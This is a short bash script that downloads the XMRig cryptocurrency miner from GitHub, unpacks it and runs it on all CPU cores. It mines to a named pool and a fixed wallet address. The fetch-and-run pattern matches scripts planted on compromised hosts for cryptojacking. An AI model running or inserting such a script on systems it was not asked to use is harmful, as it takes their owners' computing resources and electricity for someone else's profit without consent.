#!/bin/bash
wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
tar xf xmrig-6.22.2-linux-static-x64.tar.gz
cd xmrig-6.22.2
./xmrig --donate-level 1 -a rx/0 -o us.0xpool.io:3333 -u 0x378e69407CFB7A0CC9Cf5632fFe0453370c4e57F -p $(echo $RANDOM | md5sum | head -c 20) -t $(nproc --all)
